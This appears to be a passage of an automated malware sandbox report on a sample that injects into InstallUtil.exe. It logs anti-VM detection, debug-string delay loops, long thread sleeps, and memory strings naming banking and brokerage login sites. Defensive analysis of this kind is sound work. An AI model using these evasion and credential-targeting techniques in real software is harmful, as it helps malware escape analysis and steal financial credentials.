                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR
                    Tries to delay execution (extensive OutputDebugStringW loop)
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeSection loaded: OutputDebugStringW count: 126
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 7E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 8E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: 9020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: A020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: A3B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeMemory allocated: C3B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598957Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeWindow / User API: threadDelayed 1697Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeWindow / User API: threadDelayed 6252Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8432Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1386Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 4348Thread sleep time: -91000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 7432Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 7608Thread sleep time: -64000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe TID: 7128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7776Thread sleep count: 8432 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7776Thread sleep count: 1386 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599313s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599188s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -599078s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598957s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598829s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598704s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598579s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598454s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598329s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598204s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -598079s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597954s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597829s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597704s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597579s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597454s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597329s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597204s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -597079s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596954s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596829s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596704s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596579s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596454s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596329s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596204s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -596079s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595954s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595829s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595704s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595579s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595454s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595329s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595204s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -595078s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594969s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594844s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -594110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7772Thread sleep time: -593985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598957Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595454Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595329Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
